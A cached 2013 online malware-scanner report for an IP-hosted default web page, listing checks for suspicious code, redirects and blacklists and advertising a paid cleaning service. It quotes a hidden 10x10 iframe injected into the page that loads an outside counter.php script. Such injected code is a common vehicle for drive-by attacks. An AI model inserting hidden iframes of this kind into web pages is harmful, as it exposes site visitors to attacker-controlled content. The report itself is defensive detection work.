Online Malware Scanner report for 204.227.180.5
204.227.180.5
(cached results from Fri Jul 12 16:51:44 2013 rescan)
Website Malware
Cleaning & Monitoring
Malware cleaning service from eVuln team.
- Website cleaning
- Redirects removal
- Log files inspection
- Reason eliminating
- Blacklists removal
- One year monitoring
- Repeated fixing
$119.00
- Malicious/Suspicious/Total urls checked
- 0/2/2
2 pages have suspicious code. See details below
- Blacklists
- OK
- Malicious redirects
- OK
- Malicious/Hidden/Total iFrames
- 0/1/1
1 suspicious iframe found. See details below
- Deface / Content modification
- OK
Setup daily monitoring of 204.227.180.5
Paste the following HTML code anywhere into "204.227.180.5" website.
Scanned pages/files
| Request | Server response | Status |
http://204.227.180.5/ | 200 OK Content-Length: 2493 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ds-sinjo.co.jp ...[1977 bytes skipped]... Started" pages on our Web site. We encourage you to visit these pages and add them to your list of bookmarks.</FONT></FONT></P> <P> <FONT FACE="Arial,Helvetica,sans-serif"><FONT SIZE="2">To access your Control Panel, please select the following link:</FONT></FONT></P> <P> <FONT FACE="Arial,Helvetica,sans-serif"><FONT SIZE="2"> <a href="https://ds-sinjo.co.jp/ControlPanel/"> https://ds-sinjo.co.jp/ControlPanel/</a> </FONT></FONT></P> <P> <FONT FACE="Arial,Helvetica,sans-serif"><FONT SIZE="2">Then enter your login and password.</FONT></FONT></P> <P> <FONT FACE="Arial,Helvetica,sans-serif"><FONT SIZE="2">Best wishes in using your new Web Hosting Account!</FONT></FONT> </BODY> </HTML><iframe src="http:// ...[126 bytes skipped]... Hidden iFrame found. size: 10x10 style: hidden src: http://www.knurow.com.pl/counter.php <iframe src="http://www.knurow.com.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://204.227.180.5/test404page.js | 404 Not Found Content-Length: 279 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ds-sinjo.co.jp <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /test404page.js was not found on this server.<P> <HR> <ADDRESS>Apache/1.3.42 Server at ds-sinjo.co.jp Port 80</ADDRESS> </BODY></HTML> | ||
Malicious redirects
First query (normal visit):
GET / HTTP/1.1
Host: 204.227.180.5
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 12 Jul 2013 13:51:44 GMT
Accept-Ranges: bytes
ETag: "2e00cb6-9bd-5184a675"
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Content-Length: 2493
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 06:11:01 GMT
...2493 bytes of data.
GET / HTTP/1.1
Host: 204.227.180.5
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 12 Jul 2013 13:51:44 GMT
Accept-Ranges: bytes
ETag: "2e00cb6-9bd-5184a675"
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Content-Length: 2493
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 06:11:01 GMT
...2493 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 204.227.180.5
Referer: http://www.google.com/search?q=204.227.180.5
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 204.227.180.5
Referer: http://www.google.com/search?q=204.227.180.5
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=204.227.180.5
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.ru/infected?l10n=en&url=http://204.227.180.5/
Result: 204.227.180.5 is not infected or malware details are not published yet.
Result: 204.227.180.5 is not infected or malware details are not published yet.